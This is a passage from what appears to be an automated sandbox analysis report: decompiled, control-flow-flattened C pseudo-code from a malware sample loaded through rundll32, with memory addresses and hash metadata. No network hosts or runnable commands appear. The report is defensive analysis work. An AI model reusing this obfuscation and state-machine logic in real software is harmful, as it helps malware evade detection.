                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t316 == 0xd7ced6e) {
                                                                                                                                  								_t305 =  *0x2f3dfc; // 0x0
                                                                                                                                  								_t306 = E002E5B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
                                                                                                                                  								_t352 =  &(_t352[0x10]);
                                                                                                                                  								if(_t306 == _v108) {
                                                                                                                                  									 *_t314 = _v16;
                                                                                                                                  									_t340 = 1;
                                                                                                                                  									 *((intOrPtr*)(_t314 + 4)) = _v12;
                                                                                                                                  								} else {
                                                                                                                                  									_t316 = 0xf392ab6;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t316 == 0xd86d689) {
                                                                                                                                  									_push(_t316);
                                                                                                                                  									_push(_t316);
                                                                                                                                  									_t312 = E002D7FF2(_v12);
                                                                                                                                  									_v16 = _t312;
                                                                                                                                  									if(_t312 != 0) {
                                                                                                                                  										_t316 = 0xd7ced6e;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									if(_t316 != 0xf392ab6) {
                                                                                                                                  										goto L14;
                                                                                                                                  									} else {
                                                                                                                                  										E002E8519(_v84, _v20, _v16);
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L17:
                                                                                                                                  						return _t340;
                                                                                                                                  					}
                                                                                                                                  					_t316 = 0x220b753;
                                                                                                                                  					L14:
                                                                                                                                  				} while (_t316 != 0xf4b6a65);
                                                                                                                                  				goto L17;
                                                                                                                                  			}




















































                                                                                                                                  0x002d75b4
                                                                                                                                  0x002d748b
                                                                                                                                  0x002d7491
                                                                                                                                  0x002d7531
                                                                                                                                  0x002d7542
                                                                                                                                  0x002d7547
                                                                                                                                  0x002d754e
                                                                                                                                  0x002d75d7
                                                                                                                                  0x002d75d9
                                                                                                                                  0x002d75e1
                                                                                                                                  0x002d7550
                                                                                                                                  0x002d7550
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7550
                                                                                                                                  0x002d7493
                                                                                                                                  0x002d7499
                                                                                                                                  0x002d74d4
                                                                                                                                  0x002d74d5
                                                                                                                                  0x002d74d6
                                                                                                                                  0x002d74db
                                                                                                                                  0x002d74e6
                                                                                                                                  0x002d74ec
                                                                                                                                  0x00000000
                                                                                                                                  0x002d74ec
                                                                                                                                  0x002d749b
                                                                                                                                  0x002d74a1
                                                                                                                                  0x00000000
                                                                                                                                  0x002d74a7
                                                                                                                                  0x002d74b6
                                                                                                                                  0x002d74bb
                                                                                                                                  0x002d74a1
                                                                                                                                  0x002d7499
                                                                                                                                  0x002d7491
                                                                                                                                  0x002d75e4
                                                                                                                                  0x002d75f0
                                                                                                                                  0x002d75f0
                                                                                                                                  0x002d75be
                                                                                                                                  0x002d75c0
                                                                                                                                  0x002d75c0
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                                  • API String ID: 0-2314355462
                                                                                                                                  • Opcode ID: 1a6dd5def31c5143090e8177b8588eb1afe574ec22c18b820ca35c760e827a1a
                                                                                                                                  • Instruction ID: 93727eca063664d499c7ca2c63b97f67197d570e0cce193dd59277a263e5093a
                                                                                                                                  • Opcode Fuzzy Hash: 1a6dd5def31c5143090e8177b8588eb1afe574ec22c18b820ca35c760e827a1a
                                                                                                                                  • Instruction Fuzzy Hash: 9CD11D711183819FC764CF65C88991BBBF1BBC4748F50891EF6A68A220D3B6C959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E002EC631(void* __ecx) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				unsigned int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				void* _t214;
                                                                                                                                  				void* _t220;
                                                                                                                                  				void* _t224;
                                                                                                                                  				void* _t228;
                                                                                                                                  				void* _t229;
                                                                                                                                  				void* _t233;
                                                                                                                                  				void* _t234;
                                                                                                                                  				signed int _t236;
                                                                                                                                  				signed int _t237;
                                                                                                                                  				signed int _t238;
                                                                                                                                  				void* _t248;
                                                                                                                                  				void* _t249;
                                                                                                                                  				signed int* _t251;
                                                                                                                                  				void* _t254;
                                                                                                                                  
                                                                                                                                  				_t251 =  &_v92;
                                                                                                                                  				_t234 = __ecx;
                                                                                                                                  				_v56 = 0x6c25e6;
                                                                                                                                  				_v56 = _v56 >> 0xf;
                                                                                                                                  				_v56 = _v56 >> 0xd;
                                                                                                                                  				_v56 = _v56 ^ 0x000b07b8;
                                                                                                                                  				_v60 = 0xfeb19f;
                                                                                                                                  				_v60 = _v60 | 0xe5cfed25;
                                                                                                                                  				_v60 = _v60 ^ 0x26a25afc;
                                                                                                                                  				_v60 = _v60 ^ 0xc355f8a5;
                                                                                                                                  				_v20 = 0x71f317;
                                                                                                                                  				_v20 = _v20 >> 1;
                                                                                                                                  				_v20 = _v20 ^ 0x003a157d;
                                                                                                                                  				_v64 = 0x229c82;
                                                                                                                                  				_v64 = _v64 >> 6;
                                                                                                                                  				_v64 = _v64 + 0x6845;
                                                                                                                                  				_v64 = _v64 ^ 0x000e1a2d;
                                                                                                                                  				_v80 = 0xaa3c23;
                                                                                                                                  				_v80 = _v80 + 0x9f20;
                                                                                                                                  				_v80 = _v80 + 0x8b23;
                                                                                                                                  				_v80 = _v80 | 0x21cd8be9;
                                                                                                                                  				_v80 = _v80 ^ 0x21ed2977;
                                                                                                                                  				_v84 = 0xa275e1;
                                                                                                                                  				_v84 = _v84 >> 0xd;
                                                                                                                                  				_t248 = 0;
                                                                                                                                  				_t236 = 0x36;
                                                                                                                                  				_v84 = _v84 / _t236;
                                                                                                                                  				_v84 = _v84 | 0x6f301759;
                                                                                                                                  				_t249 = 0xe982267;
                                                                                                                                  				_v84 = _v84 ^ 0x6f339045;
                                                                                                                                  				_v88 = 0x6e61be;
                                                                                                                                  				_v88 = _v88 ^ 0xaf54e0d1;
                                                                                                                                  				_v88 = _v88 >> 4;
                                                                                                                                  				_v88 = _v88 | 0xfa70c1e6;
                                                                                                                                  				_v88 = _v88 ^ 0xfaf0db59;
                                                                                                                                  				_v8 = 0x2c245a;
                                                                                                                                  				_v8 = _v8 << 8;
                                                                                                                                  				_v8 = _v8 ^ 0x2c2bf9b3;
                                                                                                                                  				_v36 = 0xcb696d;
                                                                                                                                  				_v36 = _v36 >> 4;
                                                                                                                                  				_v36 = _v36 << 5;
                                                                                                                                  				_v36 = _v36 ^ 0x019dc7aa;
                                                                                                                                  				_v76 = 0xb5019c;
                                                                                                                                  				_v76 = _v76 + 0xffffd3ce;
                                                                                                                                  				_t237 = 0x3a;
                                                                                                                                  				_v76 = _v76 / _t237;
                                                                                                                                  				_v76 = _v76 + 0xe675;
                                                                                                                                  				_v76 = _v76 ^ 0x000db5c6;
                                                                                                                                  				_v40 = 0x1e681a;
                                                                                                                                  				_t238 = 0x22;
                                                                                                                                  				_v40 = _v40 / _t238;
                                                                                                                                  				_v40 = _v40 + 0x9449;
                                                                                                                                  				_v40 = _v40 ^ 0x00094c29;
                                                                                                                                  				_v12 = 0x15a3d6;
                                                                                                                                  				_v12 = _v12 * 0x6f;
                                                                                                                                  				_v12 = _v12 ^ 0x096cbb26;
                                                                                                                                  				_v44 = 0x420567;
                                                                                                                                  				_v44 = _v44 * 0x2b;
                                                                                                                                  				_v44 = _v44 >> 8;
                                                                                                                                  				_v44 = _v44 ^ 0x0004b329;
                                                                                                                                  				_v24 = 0xd75fdc;
                                                                                                                                  				_v24 = _v24 + 0x1e6b;
                                                                                                                                  				_v24 = _v24 ^ 0x00df7832;
                                                                                                                                  				_v92 = 0x2978f4;
                                                                                                                                  				_v92 = _v92 ^ 0x1aa3462f;
                                                                                                                                  				_v92 = _v92 * 0x3a;
                                                                                                                                  				_v92 = _v92 | 0xa828e589;
                                                                                                                                  				_v92 = _v92 ^ 0xab738ef3;
                                                                                                                                  				_v28 = 0xea47cd;
                                                                                                                                  				_v28 = _v28 * 0x68;
                                                                                                                                  				_v28 = _v28 ^ 0x5f2069e4;
                                                                                                                                  				_v16 = 0x52c32f;
                                                                                                                                  				_v16 = _v16 | 0xda6d254c;
                                                                                                                                  				_v16 = _v16 ^ 0xda7308ab;
                                                                                                                                  				_v48 = 0xc39de2;
                                                                                                                                  				_v48 = _v48 ^ 0x402eeacb;
                                                                                                                                  				_v48 = _v48 + 0xb85a;
                                                                                                                                  				_v48 = _v48 ^ 0x40eaab85;
                                                                                                                                  				_v52 = 0xbb994d;
                                                                                                                                  				_v52 = _v52 | 0x0bb22e40;
                                                                                                                                  				_v52 = _v52 ^ 0x7c36a9dd;
                                                                                                                                  				_v52 = _v52 ^ 0x7782b78d;
                                                                                                                                  				_v68 = 0x6ee7f1;
                                                                                                                                  				_v68 = _v68 * 3;
                                                                                                                                  				_v68 = _v68 * 0x65;
                                                                                                                                  				_v68 = _v68 + 0xffffc283;
                                                                                                                                  				_v68 = _v68 ^ 0x834839c0;
                                                                                                                                  				_v4 = 0x2c076e;
                                                                                                                                  				_v4 = _v4 >> 2;
                                                                                                                                  				_v4 = _v4 ^ 0x00027705;
                                                                                                                                  				_v32 = 0x2be47d;
                                                                                                                                  				_v32 = _v32 >> 3;
                                                                                                                                  				_v32 = _v32 << 0x10;
                                                                                                                                  				_v32 = _v32 ^ 0x7c8953c8;
                                                                                                                                  				_v72 = 0x664751;
                                                                                                                                  				_v72 = _v72 + 0xffffb67a;
                                                                                                                                  				_v72 = _v72 + 0xf05a;
                                                                                                                                  				_v72 = _v72 + 0xffff370a;
                                                                                                                                  				_v72 = _v72 ^ 0x0066b29b;
                                                                                                                                  				goto L1;
                                                                                                                                  				do {
                                                                                                                                  					while(1) {
                                                                                                                                  						L1:
                                                                                                                                  						_t254 = _t249 - 0xe145aac;
                                                                                                                                  						if(_t254 > 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						if(_t254 == 0) {
                                                                                                                                  							_push(_t238);
                                                                                                                                  							_push(_t238);
                                                                                                                                  							_t220 = E002D474B();
                                                                                                                                  							_t251 =  &(_t251[2]);
                                                                                                                                  							_t249 = 0x70e2d06;
                                                                                                                                  							_t248 = _t248 + _t220;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t249 == 0x15047ce) {
                                                                                                                                  								_push(_t238);
                                                                                                                                  								_push(_t238);
                                                                                                                                  								_t224 = E002D474B();
                                                                                                                                  								_t251 =  &(_t251[2]);
                                                                                                                                  								_t249 = 0xe32aaf2;
                                                                                                                                  								_t248 = _t248 + _t224;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t249 == 0x4d33fe3) {
                                                                                                                                  									_push(_t238);
                                                                                                                                  									_push(_t238);
                                                                                                                                  									_t228 = E002D474B();
                                                                                                                                  									_t251 =  &(_t251[2]);
                                                                                                                                  									_t249 = 0xe45b300;
                                                                                                                                  									_t248 = _t248 + _t228;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t249 == 0x708a22e) {
                                                                                                                                  										_t238 = _v56;
                                                                                                                                  										_t229 = E002EC2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
                                                                                                                                  										_t251 =  &(_t251[3]);
                                                                                                                                  										_t249 = 0x15047ce;
                                                                                                                                  										_t248 = _t248 + _t229;
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t249 != 0x70e2d06) {
                                                                                                                                  											goto L17;
                                                                                                                                  										} else {
                                                                                                                                  											_push(_t238);
                                                                                                                                  											_push(_t238);
                                                                                                                                  											_t233 = E002D474B();
                                                                                                                                  											_t251 =  &(_t251[2]);
                                                                                                                                  											_t249 = 0x4d33fe3;
                                                                                                                                  											_t248 = _t248 + _t233;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L20:
                                                                                                                                  						return _t248;
                                                                                                                                  					}
                                                                                                                                  					if(_t249 == 0xe32aaf2) {
                                                                                                                                  						_push(_t238);
                                                                                                                                  						_push(_t238);
                                                                                                                                  						_t214 = E002D474B();
                                                                                                                                  						_t251 =  &(_t251[2]);
                                                                                                                                  						_t249 = 0xe145aac;
                                                                                                                                  						_t248 = _t248 + _t214;
                                                                                                                                  						goto L17;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t249 == 0xe45b300) {
                                                                                                                                  							_t248 = _t248 + E002EC2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
                                                                                                                                  						} else {
                                                                                                                                  							if(_t249 != 0xe982267) {
                                                                                                                                  								goto L17;
                                                                                                                                  							} else {
                                                                                                                                  								_t249 = 0x708a22e;
                                                                                                                                  								goto L1;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L20;
                                                                                                                                  					L17:
                                                                                                                                  				} while (_t249 != 0xce30a1f);
                                                                                                                                  				goto L20;
                                                                                                                                  			}








































                                                                                                                                  0x002ec95d
                                                                                                                                  0x002ec962
                                                                                                                                  0x002ec965
                                                                                                                                  0x002ec96a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec96a
                                                                                                                                  0x002ec949
                                                                                                                                  0x002ec941
                                                                                                                                  0x002ec939
                                                                                                                                  0x002ec92d
                                                                                                                                  0x002eca5f
                                                                                                                                  0x002eca68
                                                                                                                                  0x002eca68
                                                                                                                                  0x002ec9fe
                                                                                                                                  0x002eca26
                                                                                                                                  0x002eca27
                                                                                                                                  0x002eca28
                                                                                                                                  0x002eca2d
                                                                                                                                  0x002eca30
                                                                                                                                  0x002eca32
                                                                                                                                  0x00000000
                                                                                                                                  0x002eca00
                                                                                                                                  0x002eca06
                                                                                                                                  0x002eca5d
                                                                                                                                  0x002eca08
                                                                                                                                  0x002eca0e
                                                                                                                                  0x00000000
                                                                                                                                  0x002eca10
                                                                                                                                  0x002eca10
                                                                                                                                  0x00000000
                                                                                                                                  0x002eca10
                                                                                                                                  0x002eca0e
                                                                                                                                  0x002eca06
                                                                                                                                  0x00000000
                                                                                                                                  0x002eca34
                                                                                                                                  0x002eca34
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                                  • API String ID: 0-1553751006
                                                                                                                                  • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                  • Instruction ID: 19aa28f7df91c69421bcf03447f5a1db4b7434da053bf93696a909596f737c20
                                                                                                                                  • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                  • Instruction Fuzzy Hash: 28A131B28183819FC358CF66D48A41FFBE1BB85748F904A1DF595A6220D3B5DA19CF83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002EF435(intOrPtr* __ecx, signed int __edx) {
                                                                                                                                  				char _v128;
                                                                                                                                  				char _v256;
                                                                                                                                  				char _v288;
                                                                                                                                  				intOrPtr _v292;
                                                                                                                                  				signed int _v296;
                                                                                                                                  				signed int _v300;
                                                                                                                                  				signed int _v304;
                                                                                                                                  				signed int _v308;
                                                                                                                                  				signed int _v312;
                                                                                                                                  				signed int _v316;
                                                                                                                                  				signed int _v320;
                                                                                                                                  				signed int _v324;
                                                                                                                                  				signed int _v328;
                                                                                                                                  				signed int _v332;
                                                                                                                                  				signed int _v336;
                                                                                                                                  				signed int _v340;
                                                                                                                                  				signed int _v344;
                                                                                                                                  				signed int _v348;
                                                                                                                                  				signed int _v352;
                                                                                                                                  				signed int _v356;
                                                                                                                                  				signed int _v360;
                                                                                                                                  				signed int _v364;
                                                                                                                                  				signed int _v368;
                                                                                                                                  				signed int _v372;
                                                                                                                                  				signed int _v376;
                                                                                                                                  				signed int _v380;
                                                                                                                                  				signed int _v384;
                                                                                                                                  				signed int _v388;
                                                                                                                                  				signed int _v392;
                                                                                                                                  				signed int _v396;
                                                                                                                                  				signed int _v400;
                                                                                                                                  				signed int _v404;
                                                                                                                                  				signed int _v408;
                                                                                                                                  				signed int _v412;
                                                                                                                                  				signed int _v416;
                                                                                                                                  				signed int _v420;
                                                                                                                                  				signed int _v424;
                                                                                                                                  				signed int _v428;
                                                                                                                                  				signed int _v432;
                                                                                                                                  				signed int _v436;
                                                                                                                                  				signed int _v440;
                                                                                                                                  				signed int _v444;
                                                                                                                                  				signed int _v448;
                                                                                                                                  				signed int _v452;
                                                                                                                                  				intOrPtr* _v456;
                                                                                                                                  				signed int _v460;
                                                                                                                                  				signed int _v464;
                                                                                                                                  				signed int _v468;
                                                                                                                                  				signed int _v472;
                                                                                                                                  				signed int _v476;
                                                                                                                                  				signed int _v480;
                                                                                                                                  				signed int _v484;
                                                                                                                                  				signed int _v488;
                                                                                                                                  				signed int _v492;
                                                                                                                                  				signed int _v496;
                                                                                                                                  				signed int _v500;
                                                                                                                                  				signed int _v504;
                                                                                                                                  				signed int _v508;
                                                                                                                                  				signed int _v512;
                                                                                                                                  				signed int _v516;
                                                                                                                                  				signed int _v520;
                                                                                                                                  				void* _t551;
                                                                                                                                  				void* _t554;
                                                                                                                                  				signed int _t560;
                                                                                                                                  				void* _t563;
                                                                                                                                  				int _t566;
                                                                                                                                  				void* _t580;
                                                                                                                                  				signed int* _t582;
                                                                                                                                  				void* _t587;
                                                                                                                                  				signed int _t595;
                                                                                                                                  				void* _t598;
                                                                                                                                  				signed int _t601;
                                                                                                                                  				signed int _t602;
                                                                                                                                  				signed int _t603;
                                                                                                                                  				intOrPtr* _t610;
                                                                                                                                  				signed int _t634;
                                                                                                                                  				void* _t659;
                                                                                                                                  				signed int _t675;
                                                                                                                                  				signed int _t676;
                                                                                                                                  				signed int _t677;
                                                                                                                                  				signed int _t678;
                                                                                                                                  				signed int _t679;
                                                                                                                                  				signed int _t680;
                                                                                                                                  				void* _t682;
                                                                                                                                  				void* _t683;
                                                                                                                                  				void* _t686;
                                                                                                                                  				void* _t687;
                                                                                                                                  				signed int _t692;
                                                                                                                                  				signed int _t693;
                                                                                                                                  				signed int* _t694;
                                                                                                                                  				void* _t698;
                                                                                                                                  
                                                                                                                                  				_t694 =  &_v520;
                                                                                                                                  				_v296 = __edx;
                                                                                                                                  				_v456 = __ecx;
                                                                                                                                  				_v308 = 0x7c82e0;
                                                                                                                                  				_v308 = _v308 ^ 0x9529f8b7;
                                                                                                                                  				_v308 = _v308 ^ 0x95557a57;
                                                                                                                                  				_v444 = 0xbd655a;
                                                                                                                                  				_v444 = _v444 + 0x6586;
                                                                                                                                  				_v444 = _v444 + 0xffff1486;
                                                                                                                                  				_v444 = _v444 ^ 0x00b10b5d;
                                                                                                                                  				_v360 = 0x6df28f;
                                                                                                                                  				_v360 = _v360 >> 0xc;
                                                                                                                                  				_v360 = _v360 ^ 0xc93a0f00;
                                                                                                                                  				_v360 = _v360 ^ 0xc93b57a7;
                                                                                                                                  				_v380 = 0x803da4;
                                                                                                                                  				_v380 = _v380 + 0x81b0;
                                                                                                                                  				_v380 = _v380 << 0x10;
                                                                                                                                  				_v380 = _v380 ^ 0xbf59b73f;
                                                                                                                                  				_v484 = 0xdeaf13;
                                                                                                                                  				_v484 = _v484 | 0x05ba16e8;
                                                                                                                                  				_v484 = _v484 + 0xffff5e7b;
                                                                                                                                  				_v484 = _v484 + 0x21a5;
                                                                                                                                  				_v484 = _v484 ^ 0x05f35408;
                                                                                                                                  				_v516 = 0x9c12e3;
                                                                                                                                  				_v516 = _v516 >> 5;
                                                                                                                                  				_v516 = _v516 + 0x3879;
                                                                                                                                  				_t686 = 0x618a3a9;
                                                                                                                                  				_t676 = 0x46;
                                                                                                                                  				_v516 = _v516 / _t676;
                                                                                                                                  				_v516 = _v516 ^ 0x000beb5e;
                                                                                                                                  				_v404 = 0x49e9fe;
                                                                                                                                  				_v404 = _v404 + 0x1375;
                                                                                                                                  				_v404 = _v404 | 0x014362a3;
                                                                                                                                  				_v404 = _v404 ^ 0x01430578;
                                                                                                                                  				_v408 = 0xd49d0c;
                                                                                                                                  				_v408 = _v408 + 0x89ee;
                                                                                                                                  				_v408 = _v408 | 0xbbfa4d8a;
                                                                                                                                  				_v408 = _v408 ^ 0xbbf95772;
                                                                                                                                  				_v504 = 0x33cefe;
                                                                                                                                  				_v504 = _v504 >> 0xa;
                                                                                                                                  				_v504 = _v504 >> 0xd;
                                                                                                                                  				_v504 = _v504 + 0xffff4738;
                                                                                                                                  				_v504 = _v504 ^ 0xfff61340;
                                                                                                                                  				_v388 = 0x38423a;
                                                                                                                                  				_t75 =  &_v388; // 0x38423a
                                                                                                                                  				_t601 = 0x7b;
                                                                                                                                  				_v388 =  *_t75 * 0x2c;
                                                                                                                                  				_v388 = _v388 + 0x7a90;
                                                                                                                                  				_v388 = _v388 ^ 0x09a92ca6;
                                                                                                                                  				_v396 = 0x89c34a;
                                                                                                                                  				_v396 = _v396 >> 6;
                                                                                                                                  				_v396 = _v396 | 0xaa955d3e;
                                                                                                                                  				_v396 = _v396 ^ 0xaa9cf099;
                                                                                                                                  				_v316 = 0x54e1fb;
                                                                                                                                  				_v316 = _v316 + 0xffff88b2;
                                                                                                                                  				_v316 = _v316 ^ 0x0053b1cb;
                                                                                                                                  				_v392 = 0xd67855;
                                                                                                                                  				_v392 = _v392 + 0xd739;
                                                                                                                                  				_v392 = _v392 * 0x34;
                                                                                                                                  				_v392 = _v392 ^ 0x2bb8cf2c;
                                                                                                                                  				_v512 = 0x9dc1ac;
                                                                                                                                  				_v512 = _v512 | 0xff1b5e8c;
                                                                                                                                  				_v512 = _v512 / _t601;
                                                                                                                                  				_v512 = _v512 + 0xc237;
                                                                                                                                  				_v512 = _v512 ^ 0x02115509;
                                                                                                                                  				_v368 = 0xb0c27;
                                                                                                                                  				_v368 = _v368 * 0x3a;
                                                                                                                                  				_v368 = _v368 + 0x9417;
                                                                                                                                  				_v368 = _v368 ^ 0x028ae81d;
                                                                                                                                  				_v352 = 0x7ea940;
                                                                                                                                  				_v352 = _v352 + 0xffff6a40;
                                                                                                                                  				_v352 = _v352 | 0x1d7a7563;
                                                                                                                                  				_v352 = _v352 ^ 0x1d74a207;
                                                                                                                                  				_v340 = 0xd37cb9;
                                                                                                                                  				_v340 = _v340 >> 5;
                                                                                                                                  				_v340 = _v340 ^ 0x00021b7e;
                                                                                                                                  				_v384 = 0xc54f7c;
                                                                                                                                  				_v384 = _v384 | 0xe1c129a4;
                                                                                                                                  				_v384 = _v384 << 6;
                                                                                                                                  				_v384 = _v384 ^ 0x7152788e;
                                                                                                                                  				_v320 = 0xafdf9b;
                                                                                                                                  				_v320 = _v320 | 0x588bef45;
                                                                                                                                  				_v320 = _v320 ^ 0x58ad1127;
                                                                                                                                  				_v508 = 0x7882a6;
                                                                                                                                  				_v508 = _v508 ^ 0x5ae648f7;
                                                                                                                                  				_t677 = 0x7e;
                                                                                                                                  				_v508 = _v508 / _t677;
                                                                                                                                  				_v508 = _v508 + 0xffff266f;
                                                                                                                                  				_v508 = _v508 ^ 0x00b4570c;
                                                                                                                                  				_v344 = 0x25ec7c;
                                                                                                                                  				_t158 =  &_v344; // 0x25ec7c
                                                                                                                                  				_t692 = 0x77;
                                                                                                                                  				_v344 =  *_t158 * 0x48;
                                                                                                                                  				_v344 = _v344 ^ 0x0aab681c;
                                                                                                                                  				_v332 = 0xac456;
                                                                                                                                  				_v332 = _v332 ^ 0x143b2d92;
                                                                                                                                  				_v332 = _v332 ^ 0x1438ce6d;
                                                                                                                                  				_v436 = 0x1dd68;
                                                                                                                                  				_v436 = _v436 + 0x1e14;
                                                                                                                                  				_v436 = _v436 / _t692;
                                                                                                                                  				_v436 = _v436 ^ 0x000407e3;
                                                                                                                                  				_v468 = 0x975814;
                                                                                                                                  				_v468 = _v468 | 0x165c3dad;
                                                                                                                                  				_v468 = _v468 >> 3;
                                                                                                                                  				_v468 = _v468 + 0x9a99;
                                                                                                                                  				_v468 = _v468 ^ 0x02d4af38;
                                                                                                                                  				_v428 = 0xd1fa32;
                                                                                                                                  				_v428 = _v428 + 0x34cd;
                                                                                                                                  				_v428 = _v428 >> 0xa;
                                                                                                                                  				_v428 = _v428 ^ 0x000c7c43;
                                                                                                                                  				_v372 = 0xb93604;
                                                                                                                                  				_v372 = _v372 >> 0xb;
                                                                                                                                  				_v372 = _v372 + 0x569f;
                                                                                                                                  				_v372 = _v372 ^ 0x0001c97c;
                                                                                                                                  				_v312 = 0xb8b780;
                                                                                                                                  				_v312 = _v312 / _t601;
                                                                                                                                  				_v312 = _v312 ^ 0x0009bb57;
                                                                                                                                  				_v364 = 0xc6b8c5;
                                                                                                                                  				_v364 = _v364 >> 4;
                                                                                                                                  				_v364 = _v364 << 0xf;
                                                                                                                                  				_v364 = _v364 ^ 0x35c8234d;
                                                                                                                                  				_v500 = 0x5d2db3;
                                                                                                                                  				_v500 = _v500 | 0xa4ec7bca;
                                                                                                                                  				_v500 = _v500 * 0x42;
                                                                                                                                  				_v500 = _v500 + 0xffff6871;
                                                                                                                                  				_v500 = _v500 ^ 0x8955fb09;
                                                                                                                                  				_v492 = 0xf8ac1c;
                                                                                                                                  				_v492 = _v492 + 0xd489;
                                                                                                                                  				_v492 = _v492 | 0x938b5662;
                                                                                                                                  				_v492 = _v492 << 6;
                                                                                                                                  				_v492 = _v492 ^ 0xfef6fac0;
                                                                                                                                  				_v356 = 0x80a8a7;
                                                                                                                                  				_v356 = _v356 >> 3;
                                                                                                                                  				_v356 = _v356 + 0xffff1aa9;
                                                                                                                                  				_v356 = _v356 ^ 0x00023cc5;
                                                                                                                                  				_v420 = 0x29f504;
                                                                                                                                  				_v420 = _v420 ^ 0x96d25191;
                                                                                                                                  				_v420 = _v420 << 0xa;
                                                                                                                                  				_v420 = _v420 ^ 0xee96722c;
                                                                                                                                  				_v476 = 0x6526e6;
                                                                                                                                  				_t250 =  &_v476; // 0x6526e6
                                                                                                                                  				_t602 = 9;
                                                                                                                                  				_t678 = 0x5e;
                                                                                                                                  				_v476 =  *_t250 * 0x65;
                                                                                                                                  				_t252 =  &_v476; // 0x6526e6
                                                                                                                                  				_v476 =  *_t252 * 0x5d;
                                                                                                                                  				_v476 = _v476 + 0xffffa50d;
                                                                                                                                  				_v476 = _v476 ^ 0x7f6d4504;
                                                                                                                                  				_v304 = 0x6f90;
                                                                                                                                  				_v304 = _v304 + 0xffffb625;
                                                                                                                                  				_v304 = _v304 ^ 0x0000ce69;
                                                                                                                                  				_v348 = 0xd48165;
                                                                                                                                  				_v348 = _v348 * 0x4f;
                                                                                                                                  				_v348 = _v348 + 0xa298;
                                                                                                                                  				_v348 = _v348 ^ 0x41980148;
                                                                                                                                  				_v412 = 0x7e685b;
                                                                                                                                  				_t271 =  &_v412; // 0x7e685b
                                                                                                                                  				_v412 =  *_t271 * 0x1d;
                                                                                                                                  				_v412 = _v412 >> 0xe;
                                                                                                                                  				_v412 = _v412 ^ 0x000f1110;
                                                                                                                                  				_v460 = 0xd80dae;
                                                                                                                                  				_v460 = _v460 * 0x4a;
                                                                                                                                  				_v460 = _v460 << 9;
                                                                                                                                  				_v460 = _v460 >> 5;
                                                                                                                                  				_v460 = _v460 ^ 0x073a202e;
                                                                                                                                  				_v324 = 0x2acd4f;
